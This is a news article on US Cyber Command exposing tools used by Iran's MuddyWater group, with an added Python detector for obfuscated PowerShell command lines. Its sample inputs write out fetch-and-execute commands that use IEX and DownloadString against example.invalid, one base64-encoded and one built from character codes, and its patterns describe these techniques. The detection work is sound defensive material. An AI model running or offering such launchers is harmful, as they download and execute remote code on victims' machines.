Open-source tools deployed by malicious Iran-based cyber actors have been exposed.
The US Cyber Command’s Cyber National Mission Force has identified and disclosed multiple open-source tools leveraged by Iranian intelligence across networks around the world.
Referred to as “MuddyWater” – a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS) – the actors primarily target Middle Eastern nations but have more recently sought to undermine European and North American networks.
According to the Congressional Research Service, the MOIS conducts domestic surveillance to identify regime opponents and surveil anti-regime activists abroad through a network of agents placed in Iran’s embassies.
The US Cyber Command has warned that the presence of multiple open-source tools on the same network could be an indicator of the presence of Iranian malicious cyber actors.
Specifically, methods employed by the state-sponsored actors include sideloading DLLs to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions.
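The obfuscation patterns named above (hidden windows, encoded command lines, cmdlet names assembled from character codes, remote-fetch-and-execute) are exactly what a defender's detection logic looks for in process-creation or PowerShell script-block logs. The Python script below is an added example written for this page; it is not a tool from the US Cyber Command disclosure and not code from the article. The sample command lines, the indicator names and threshold, and the `example.invalid` hosts are all constructed assumptions for illustration.

```python
import base64
import binascii
import re

# The -EncodedCommand switch (PowerShell also accepts the abbreviations -enc and -ec).
# Group 1 captures the base64 blob so it can be decoded and scanned separately.
ENCODED_FLAG = re.compile(
    r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)

# Indicator names and patterns are assumptions chosen for this example; a production
# rule set would be tuned against the environment's own baseline of PowerShell use.
INDICATORS = {
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE),
    "remote_download": re.compile(
        r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b",
        re.IGNORECASE,
    ),
    # Three or more [char]NN+ fragments: a cmdlet name built from character codes.
    "char_code_assembly": re.compile(r"(?:\[char\]\s*\d+\s*\+\s*){2,}", re.IGNORECASE),
    "base64_decode_in_script": re.compile(r"frombase64string", re.IGNORECASE),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    # Backtick escapes splitting a token, e.g. I`E`X, used to defeat string matching.
    "backtick_splitting": re.compile(r"\w`\w`\w"),
}


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze_command_line(cmd: str) -> dict:
    """Return the obfuscation indicators found in one process command line.

    If an encoded command is present it is decoded and scanned as well, and the
    base64 blob itself is removed from the text before scanning so that random
    base64 characters cannot produce false indicator hits.
    """
    findings = set()
    decoded = None
    text_to_scan = cmd
    m = ENCODED_FLAG.search(cmd)
    if m:
        findings.add("encoded_command")
        text_to_scan = cmd[: m.start(1)] + cmd[m.end(1):]
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            findings.add("undecodable_encoded_payload")
    for text in (text_to_scan, decoded or ""):
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                findings.add(name)
    return {"command": cmd, "decoded": decoded, "indicators": sorted(findings)}


def is_suspicious(report: dict, threshold: int = 2) -> bool:
    """Flag a command line once it accumulates `threshold` independent indicators."""
    return len(report["indicators"]) >= threshold


def scan(command_lines) -> list:
    """Analyze a batch of command lines and return only the suspicious reports."""
    return [r for r in (analyze_command_line(c) for c in command_lines) if is_suspicious(r)]


# Constructed sample command lines (not taken from the page or any real incident).
SAMPLE_COMMAND_LINES = [
    # Hidden-window, encoded launcher whose payload fetches and runs remote code.
    "powershell.exe -NoP -W Hidden -EncodedCommand "
    + encode_powershell("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"),
    # Ordinary administrative use: runs a local maintenance script.
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    # Assembles the cmdlet name from character codes to evade plain string matching.
    "powershell.exe -c \"$a=[char]73+[char]69+[char]88; & $a "
    "(New-Object Net.WebClient).DownloadString('http://example.invalid/b')\"",
    # Ordinary administrative use: service inventory.
    "powershell.exe -c \"Get-Service | Where-Object Status -eq Running\"",
]

if __name__ == "__main__":
    for report in scan(SAMPLE_COMMAND_LINES):
        print("SUSPICIOUS:", report["indicators"])
        print("  command:", report["command"][:80])
        if report["decoded"]:
            print("  decoded:", report["decoded"])
```

In practice the input would be Sysmon process-creation events or PowerShell script-block logs rather than a hard-coded list, and the threshold would be tuned so that routine administrative use (the two benign samples above score zero) does not page anyone. Counting several weak indicators instead of matching one string is what keeps the rule useful once an actor varies the individual tricks.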
This latest announcement from US Cyber Command comes just months after multinational cyber agencies observed an Iranian government-sponsored APT group exploiting Microsoft Exchange vulnerabilities to undermine critical infrastructure.
Iranian government-sponsored APT actors have actively targeted a broad range of victims across both the public and private sector from within the US and in partner nations, including Australia.
The joint cyber security advisory followed a joint investigation among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom’s National Cyber Security Centre (NCSC).